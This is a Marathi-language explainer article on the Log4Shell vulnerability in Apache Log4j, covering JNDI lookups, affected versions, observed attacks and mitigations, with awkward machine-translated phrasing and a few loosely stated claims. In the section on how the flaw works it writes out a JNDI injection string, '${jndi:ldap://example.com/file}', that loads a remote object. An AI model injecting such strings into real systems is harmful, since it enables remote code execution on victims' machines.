अनुक्रमणिका[लपवा][दाखवा]
नोव्हेंबर २०२१ च्या उत्तरार्धात, आम्ही सायबर सुरक्षेसाठी एक मोठा धोका उघड केला. या शोषणामुळे जगभरातील लाखो संगणक प्रणालींवर संभाव्य परिणाम होईल.
हे Log4j असुरक्षा आणि दुर्लक्षित डिझाईनमधील त्रुटींमुळे जगातील 90% पेक्षा जास्त संगणक सेवा आक्रमणासाठी खुल्या कशा राहिल्या याबद्दल मार्गदर्शक आहे.
Apache Log4j ही Apache Software Foundation द्वारे विकसित केलेली ओपन-सोर्स Java-आधारित लॉगिंग उपयुक्तता आहे. मूलतः 2001 मध्ये Ceki Gülcü ने लिहिलेले, ते आता Apache Logging Services चा भाग आहे, Apache Software Foundation चा एक प्रकल्प.
जगभरातील कंपन्या त्यांच्या ऍप्लिकेशन्सवर लॉगिंग सक्षम करण्यासाठी Log4j लायब्ररी वापरतात. खरं तर, जावा लायब्ररी इतकी सर्वव्यापी आहे, तुम्हाला ती अॅमेझॉन, मायक्रोसॉफ्ट, गुगल आणि अधिकच्या अॅप्लिकेशन्समध्ये मिळू शकते.
लायब्ररीच्या महत्त्वाचा अर्थ असा आहे की कोडमधील कोणत्याही संभाव्य त्रुटीमुळे लाखो संगणक हॅकिंगसाठी खुले होऊ शकतात. 24 नोव्हेंबर 2021 रोजी, ए मेघ सुरक्षा अलीबाबासाठी काम करणाऱ्या संशोधकाला एक भयंकर दोष सापडला.
Log4j भेद्यता, ज्याला Log4Shell म्हणूनही ओळखले जाते, 2013 पासून लक्ष न दिलेले अस्तित्वात आहे. असुरक्षिततेमुळे दुर्भावनापूर्ण अभिनेत्यांना Log4j चालवणार्या प्रभावित सिस्टमवर कोड चालवण्याची परवानगी मिळाली. हे 9 डिसेंबर 2021 रोजी सार्वजनिकरित्या उघड करण्यात आले
उद्योग तज्ञ Log4Shell दोष म्हणतात अलीकडील मेमरीमधील सर्वात मोठी असुरक्षा.
असुरक्षिततेच्या प्रकाशनानंतरच्या आठवड्यात, सायबरसुरक्षा संघांनी लाखो हल्ले शोधले. काही संशोधकांनी प्रति मिनिट शंभरहून अधिक हल्ल्यांचा दर देखील पाहिला.
हे कस काम करत?
Log4Shell इतके धोकादायक का आहे हे समजून घेण्यासाठी, आम्हाला ते काय सक्षम आहे हे समजून घेणे आवश्यक आहे.
Log4Shell भेद्यता अनियंत्रित कोडच्या अंमलबजावणीसाठी परवानगी देते, ज्याचा मूळ अर्थ असा होतो की आक्रमणकर्ता लक्ष्य मशीनवर कोणतीही कमांड किंवा कोड चालवू शकतो.
ते हे कसे पूर्ण करते?
प्रथम, आपल्याला जेएनडीआय म्हणजे काय हे समजून घेणे आवश्यक आहे.
Java नेमिंग अँड डिरेक्टरी इंटरफेस (JNDI) ही Java सेवा आहे जी Java प्रोग्राम्सना नावाद्वारे डेटा आणि संसाधने शोधू आणि शोधू देते. या निर्देशिका सेवा महत्त्वाच्या आहेत कारण ते अनुप्रयोग तयार करताना विकसकांना सहजपणे संदर्भ देण्यासाठी रेकॉर्डचा एक संघटित संच प्रदान करतात.
JNDI विशिष्ट निर्देशिकेत प्रवेश करण्यासाठी विविध प्रोटोकॉल वापरू शकते. या प्रोटोकॉलपैकी एक म्हणजे लाइटवेट डिरेक्टरी ऍक्सेस प्रोटोकॉल, किंवा LDAP.
स्ट्रिंग लॉग करताना, log4j जेव्हा फॉर्मच्या अभिव्यक्ती आढळतात तेव्हा स्ट्रिंग प्रतिस्थापन करते ${prefix:name}
.
उदाहरणार्थ, Text: ${java:version}
मजकूर म्हणून लॉग इन केले जाऊ शकते: Java आवृत्ती 1.8.0_65. या प्रकारचे प्रतिस्थापन सामान्य आहेत.
आमच्याकडे अभिव्यक्ती देखील असू शकतात जसे की Text: ${jndi:ldap://example.com/file}
जे LDAP प्रोटोकॉलद्वारे URL वरून Java ऑब्जेक्ट लोड करण्यासाठी JNDI प्रणाली वापरते.
हे त्या URL वरून येणारा डेटा मशीनमध्ये प्रभावीपणे लोड करते. कोणताही संभाव्य हॅकर सार्वजनिक URL वर दुर्भावनापूर्ण कोड होस्ट करू शकतो आणि लॉग 4j वापरून मशीनची प्रतीक्षा करू शकतो.
लॉग संदेशांच्या सामग्रीमध्ये वापरकर्ता-नियंत्रित डेटा असल्याने, हॅकर्स त्यांचे स्वतःचे JNDI संदर्भ समाविष्ट करू शकतात जे ते नियंत्रित करत असलेल्या LDAP सर्व्हरकडे निर्देश करतात. हे LDAP सर्व्हर दुर्भावनापूर्ण Java ऑब्जेक्ट्सने भरलेले असू शकतात जे JNDI असुरक्षिततेद्वारे कार्यान्वित करू शकते.
यास वाईट बनवते ते म्हणजे अनुप्रयोग सर्व्हर-साइड किंवा क्लायंट-साइड अनुप्रयोग असल्यास काही फरक पडत नाही.
जोपर्यंत लॉगरला आक्रमणकर्त्याचा दुर्भावनापूर्ण कोड वाचण्याचा मार्ग आहे तोपर्यंत, अनुप्रयोग शोषणासाठी खुला आहे.
कोण प्रभावित आहे?
भेद्यता APache Log4j वापरणाऱ्या सर्व सिस्टीम आणि सेवांना प्रभावित करते, 2.0 पर्यंत आवृत्त्या आणि 2.14.1 सह.
अनेक सुरक्षा तज्ञ सल्ला देतात की असुरक्षा Java वापरणाऱ्या अनेक अनुप्रयोगांवर परिणाम करू शकते.
मायक्रोसॉफ्टच्या मालकीच्या Minecraft व्हिडिओ गेममध्ये हा दोष प्रथम शोधला गेला. मायक्रोसॉफ्टने त्यांच्या वापरकर्त्यांना कोणताही धोका टाळण्यासाठी त्यांचे Java संस्करण Minecraft सॉफ्टवेअर अपग्रेड करण्याचे आवाहन केले आहे.
सायबर सिक्युरिटी अँड इन्फ्रास्ट्रक्चर सिक्युरिटी एजन्सी (सीआयएसए) चे संचालक जेन इस्टरली म्हणतात की विक्रेत्यांकडे ए. प्रमुख जबाबदारी अंतिम वापरकर्त्यांना या भेद्यतेचा गैरफायदा घेणाऱ्या दुर्भावनापूर्ण अभिनेत्यांपासून प्रतिबंधित करण्यासाठी.
"अंतिम वापरकर्त्यांना त्यांच्या उत्पादनात ही भेद्यता आहे आणि सॉफ्टवेअर अद्यतनांना प्राधान्य दिले पाहिजे हे सुनिश्चित करण्यासाठी विक्रेत्यांनी त्यांच्या ग्राहकांशी देखील संवाद साधला पाहिजे."
हल्ले आधीच सुरू झाल्याची माहिती आहे. सायबर सिक्युरिटी सॉफ्टवेअर पुरवणारी कंपनी सिमेंटेकने विविध प्रकारच्या हल्ल्यांच्या विनंत्या पाहिल्या आहेत.
संशोधकांनी शोधलेल्या हल्ल्यांच्या प्रकारांची येथे काही उदाहरणे आहेत:
- botnets
Botnets हे संगणकाचे नेटवर्क आहे जे एकाच आक्रमण करणाऱ्या पक्षाच्या नियंत्रणाखाली असते. ते DDoS हल्ले करण्यात, डेटा चोरण्यात आणि इतर घोटाळे करण्यात मदत करतात. संशोधकांनी Log4j शोषणातून डाउनलोड केलेल्या शेल स्क्रिप्टमध्ये मुहस्टिक बॉटनेटचे निरीक्षण केले.
- XMRig Miner ट्रोजन
XMRig एक मुक्त-स्रोत क्रिप्टोकरन्सी मायनर आहे जो मोनेरो टोकनची खाण करण्यासाठी CPU चा वापर करतो. सायबर गुन्हेगार लोकांच्या उपकरणांवर XMRig स्थापित करू शकतात जेणेकरून ते त्यांच्या माहितीशिवाय त्यांची प्रक्रिया शक्ती वापरू शकतील.
- खोसारी रॅन्समवेअर
रॅन्समवेअर हे डिझाइन केलेल्या मालवेअरच्या स्वरूपाचा संदर्भ देते फायली एनक्रिप्ट करा संगणकावर. हल्लेखोर नंतर एनक्रिप्टेड फाइल्समध्ये परत प्रवेश देण्याच्या बदल्यात पेमेंटची मागणी करू शकतात. Log4Shell हल्ल्यांमध्ये संशोधकांना खोन्सारी रॅन्समवेअर सापडले. ते विंडोज सर्व्हरला लक्ष्य करतात आणि .NET फ्रेमवर्कचा वापर करतात.
पुढे काय होईल?
Log4J असुरक्षिततेमुळे निर्माण झालेली अराजकता पूर्णपणे दूर करण्यासाठी काही महिने किंवा कदाचित वर्षेही लागू शकतात असा तज्ञांचा अंदाज आहे.
या प्रक्रियेमध्ये प्रत्येक प्रभावित प्रणालीला पॅच केलेल्या आवृत्तीसह अद्यतनित करणे समाविष्ट आहे. जरी या सर्व सिस्टीम पॅच केल्या गेल्या तरीही, संभाव्य बॅकडोअर्सचा धोका अजूनही आहे जो हॅकर्सने आधीच त्या विंडोमध्ये जोडला असेल ज्यावर सर्व्हर हल्ला करण्यासाठी खुले होते.
अनेक उपाय आणि शमन या बगद्वारे ऍप्लिकेशन्सचे शोषण होण्यापासून रोखण्यासाठी अस्तित्वात आहे. नवीन Log4j आवृत्ती 2.15.0-rc1 ने ही भेद्यता कमी करण्यासाठी विविध सेटिंग्ज बदलल्या.
JNDI वापरणारी सर्व वैशिष्ट्ये डीफॉल्टनुसार अक्षम केली जातील आणि रिमोट लुकअप देखील प्रतिबंधित केले गेले आहेत. तुमच्या Log4j सेटअपवर लुकअप वैशिष्ट्य अक्षम केल्याने संभाव्य शोषणाचा धोका कमी होण्यास मदत होईल.
Log4j च्या बाहेर, ओपन-सोर्स शोषण रोखण्यासाठी अजूनही एका व्यापक योजनेची गरज आहे.
याआधी मे महिन्यात व्हाईट हाऊसने ए कार्यकारी आदेश ज्याचा उद्देश राष्ट्रीय सायबर सुरक्षा सुधारणे हा आहे. त्यात सॉफ्टवेअर बिल ऑफ मटेरियल (SBOM) साठी तरतूद समाविष्ट होती जी मूलत: एक औपचारिक दस्तऐवज होती ज्यामध्ये अनुप्रयोग तयार करण्यासाठी आवश्यक असलेल्या प्रत्येक वस्तूची सूची होती.
यामध्ये भाग समाविष्ट आहेत जसे की मुक्त स्रोत विकासासाठी वापरलेली पॅकेजेस, अवलंबित्व आणि API. जरी SBOMs ची कल्पना पारदर्शकतेसाठी उपयुक्त असली तरी त्याचा ग्राहकांना खरोखरच फायदा होईल का?
अवलंबित्व अपग्रेड करणे खूप त्रासदायक असू शकते. पर्यायी पॅकेजेस शोधण्यात अतिरिक्त वेळ वाया घालवण्यापेक्षा कंपन्या कोणताही दंड भरणे निवडू शकतात. कदाचित हे एसबीओएम फक्त उपयुक्त असतील तरच त्यांचे व्याप्ती पुढे मर्यादित आहे.
निष्कर्ष
Log4j समस्या ही संस्थांसाठी तांत्रिक समस्यांपेक्षा जास्त आहे.
व्यावसायिक नेत्यांनी त्यांचे सर्व्हर, उत्पादने किंवा सेवा जेव्हा ते स्वतः देखरेख करत नसलेल्या कोडवर अवलंबून असतात तेव्हा उद्भवू शकणार्या संभाव्य धोक्यांची जाणीव असणे आवश्यक आहे.
ओपन सोर्स आणि थर्ड पार्टी अॅप्लिकेशन्सवर अवलंबून राहणे नेहमीच काही प्रमाणात धोक्याचे असते. नवीन धोके समोर येण्यापूर्वी कंपन्यांनी जोखीम कमी करण्याच्या धोरणांवर काम करण्याचा विचार केला पाहिजे.
वेबचा बराचसा भाग जगभरातील हजारो स्वयंसेवकांनी राखलेल्या मुक्त-स्रोत सॉफ्टवेअरवर अवलंबून असतो.
जर आम्हाला वेब एक सुरक्षित स्थान ठेवायचे असेल, तर सरकार आणि कॉर्पोरेशननी मुक्त स्रोत प्रयत्नांसाठी आणि सायबर सुरक्षा एजन्सीजला निधी देण्यासाठी गुंतवणूक केली पाहिजे जसे की सीआयएसए.
प्रत्युत्तर द्या